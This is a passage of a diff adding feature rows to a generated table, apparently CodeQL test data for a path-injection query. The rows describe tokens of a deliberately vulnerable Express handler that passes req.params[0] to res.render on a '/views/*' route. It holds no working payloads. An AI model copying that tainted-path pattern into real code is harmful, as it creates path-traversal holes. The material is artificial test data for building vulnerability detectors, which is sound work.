| views_local | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:19 | views_local | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:19 | views_local | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_l ... ams[0]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_l ... ams[0]) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_l ... ams[0]) | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_l ... ams[0]) | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_l ... ams[0]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_local | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_local | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_local | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_local | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:9:87:61 | views_local | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | 'arguments' object of function views_local | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | 'arguments' object of function views_local | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | 'arguments' object of function views_local | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | 'arguments' object of function views_local | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | 'arguments' object of function views_local | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | (req, r ... ams[0]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | (req, r ... ams[0]) | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | (req, r ... ams[0]) | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | (req, r ... ams[0]) | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | (req, r ... ams[0]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | exceptional return of function views_local | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | exceptional return of function views_local | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | exceptional return of function views_local | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | exceptional return of function views_local | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | exceptional return of function views_local | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | return of function views_local | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | return of function views_local | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | return of function views_local | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | return of function views_local | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:23:87:61 | return of function views_local | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:24:87:26 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:29:87:31 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:39 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:39 | res | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:39 | res | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:39 | res | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:39 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:46 | res.render | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:46 | res.render | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:46 | res.render | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:46 | res.render | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:46 | res.render | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | exceptional return of res.ren ... ams[0]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | exceptional return of res.ren ... ams[0]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | exceptional return of res.ren ... ams[0]) | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | exceptional return of res.ren ... ams[0]) | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | exceptional return of res.ren ... ams[0]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | res.ren ... ams[0]) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | res.ren ... ams[0]) | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | res.ren ... ams[0]) | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | res.ren ... ams[0]) | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:37:87:61 | res.ren ... ams[0]) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:41:87:46 | render | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:41:87:46 | render | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:41:87:46 | render | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:41:87:46 | render | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:41:87:46 | render | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:50 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:50 | req | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:50 | req | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:50 | req | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:50 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:57 | req.params | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:57 | req.params | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:57 | req.params | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:57 | req.params | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:48:87:57 | req.params | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:87:48:87:60 | req.params[0] | CalleeFlexibleAccessPath | res.render | | autogenerated/TaintedPath/TaintedPath.js:87:48:87:60 | req.params[0] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:87:48:87:60 | req.params[0] | contextFunctionInterfaces | views_local(req, res) | @@ -5422,6 +61221,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:87:48:87:60 | req.params[0] | enclosingFunctionName | | | autogenerated/TaintedPath/TaintedPath.js:87:48:87:60 | req.params[0] | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:87:48:87:60 | req.params[0] | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:87:52:87:57 | params | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:52:87:57 | params | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:52:87:57 | params | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:52:87:57 | params | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:52:87:57 | params | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:87:59:87:59 | 0 | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:59:87:59 | 0 | contextSurroundingFunctionParameters | ()\n(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:87:59:87:59 | 0 | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:87:59:87:59 | 0 | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:87:59:87:59 | 0 | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:15 | application | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:15 | application | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:15 | application | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:15 | application | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:15 | application | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:19 | application.get | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:19 | application.get | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:19 | application.get | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:19 | application.get | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:19 | application.get | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | applica ... _local) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | applica ... _local) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | applica ... _local) | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | applica ... _local) | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | applica ... _local) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | exceptional return of applica ... _local) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | exceptional return of applica ... _local) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | exceptional return of applica ... _local) | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | exceptional return of applica ... _local) | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:88:5:88:44 | exceptional return of applica ... _local) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:88:17:88:19 | get | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:88:17:88:19 | get | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:88:17:88:19 | get | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:88:17:88:19 | get | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:88:17:88:19 | get | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:88:21:88:30 | '/views/*' | CalleeFlexibleAccessPath | application.get | | autogenerated/TaintedPath/TaintedPath.js:88:21:88:30 | '/views/*' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:88:21:88:30 | '/views/*' | calleeImports | express | @@ -5440,6 +61274,36 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:88:33:88:43 | views_local | enclosingFunctionName | | | autogenerated/TaintedPath/TaintedPath.js:88:33:88:43 | views_local | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:88:33:88:43 | views_local | receiverName | application | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:22 | views_imported | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:22 | views_imported | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:22 | views_imported | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:22 | views_imported | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:22 | views_imported | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_i ... views") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_i ... views") | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_i ... views") | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_i ... views") | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_i ... views") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_imported | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_imported | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_imported | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_imported | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:90:9:90:43 | views_imported | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:32 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:32 | require | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:32 | require | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:32 | require | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:32 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | exceptional return of require("./views") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | exceptional return of require("./views") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | exceptional return of require("./views") | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | exceptional return of require("./views") | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | exceptional return of require("./views") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | require("./views") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | require("./views") | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | require("./views") | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | require("./views") | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:90:26:90:43 | require("./views") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:90:34:90:42 | "./views" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:90:34:90:42 | "./views" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:90:34:90:42 | "./views" | calleeImports | | @@ -5448,6 +61312,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:90:34:90:42 | "./views" | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | | autogenerated/TaintedPath/TaintedPath.js:90:34:90:42 | "./views" | enclosingFunctionName | | | autogenerated/TaintedPath/TaintedPath.js:90:34:90:42 | "./views" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:15 | application | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:15 | application | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:15 | application | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:15 | application | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:15 | application | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:19 | application.get | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:19 | application.get | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:19 | application.get | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:19 | application.get | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:19 | application.get | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | applica ... ported) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | applica ... ported) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | applica ... ported) | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | applica ... ported) | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | applica ... ported) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | exceptional return of applica ... ported) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | exceptional return of applica ... ported) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | exceptional return of applica ... ported) | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | exceptional return of applica ... ported) | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:91:5:91:47 | exceptional return of applica ... ported) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:91:17:91:19 | get | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:91:17:91:19 | get | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:91:17:91:19 | get | enclosingFunctionBody | express require express application express views_local req res res render req 0 params 0 application get /views/* views_local views_imported require ./views application get /views/* views_imported | +| autogenerated/TaintedPath/TaintedPath.js:91:17:91:19 | get | enclosingFunctionName | | +| autogenerated/TaintedPath/TaintedPath.js:91:17:91:19 | get | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:91:21:91:30 | '/views/*' | CalleeFlexibleAccessPath | application.get | | autogenerated/TaintedPath/TaintedPath.js:91:21:91:30 | '/views/*' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:91:21:91:30 | '/views/*' | calleeImports | express | @@ -5466,16 +61355,75 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:91:33:91:46 | views_imported | enclosingFunctionName | | | autogenerated/TaintedPath/TaintedPath.js:91:33:91:46 | views_imported | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:91:33:91:46 | views_imported | receiverName | application | +| autogenerated/TaintedPath/TaintedPath.js:95:1:95:16 | addEventListener | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:95:1:95:16 | addEventListener | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:95:1:95:16 | addEventListener | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:95:1:97:2 | addEven ... ta);\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:95:1:97:2 | addEven ... ta);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:95:1:97:2 | addEven ... ta);\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:95:1:97:2 | exceptional return of addEven ... ta);\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:95:1:97:2 | exceptional return of addEven ... ta);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:95:1:97:2 | exceptional return of addEven ... ta);\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:95:18:95:26 | 'message' | CalleeFlexibleAccessPath | addEventListener | | autogenerated/TaintedPath/TaintedPath.js:95:18:95:26 | 'message' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:95:18:95:26 | 'message' | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:95:18:95:26 | 'message' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:95:18:95:26 | 'message' | fileImports | ./views child_process express fs 